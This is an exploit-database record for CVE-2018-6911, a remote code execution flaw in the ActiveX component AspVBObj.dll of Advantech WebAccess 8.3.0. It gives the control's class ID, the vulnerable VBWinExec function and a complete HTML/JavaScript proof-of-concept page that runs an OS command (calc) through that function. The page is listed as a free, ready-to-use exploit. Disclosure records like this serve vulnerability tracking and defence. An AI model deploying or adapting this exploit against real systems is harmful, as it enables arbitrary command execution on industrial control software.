ID

VAR-E-201802-0431


TITLE

Advantech WebAccess 8.3.0 - Remote Code Execution Exploit

Trust: 0.6

sources: EDBNET: 96614

AFFECTED PRODUCTS

vendor:advantechmodel:webaccessscope:eqversion:8.3.0

Trust: 0.6

sources: EDBNET: 96614

EXPLOIT

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution
Discovered by: Nassim Asrir
Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/
CVE: CVE-2018-6911
Tested on: IE11 / Win10
Technical Details:
==================
The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.
Vulnerable File: C:\WebAccess\Node\AspVBObj.dll
Vulnerable Function: VBWinExec
Vulnerable Class: Include
Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.
Function VBWinExec (
ByRef command As String
)
Exploit:
========
<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
<SCRIPT>
function exploit()
{
rce.VBWinExec("calc")
}
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>

Trust: 0.6

sources: EDBNET: 96614

PRICE

free

Trust: 0.6

sources: EDBNET: 96614

TYPE

Remote Code Execution Exploit

Trust: 0.6

sources: EDBNET: 96614

EXTERNAL IDS

db:0DAYTODAYid:29779

Trust: 0.6

db:EDBNETid:96614

Trust: 0.6

sources: EDBNET: 96614

REFERENCES

url:https://0day.today/exploits/29779

Trust: 0.6

sources: EDBNET: 96614

SOURCES

db:EDBNETid:96614

LAST UPDATE DATE

2022-07-27T09:51:35.630000+00:00


SOURCES RELEASE DATE

db:EDBNETid:96614date:2018-02-13T00:00:00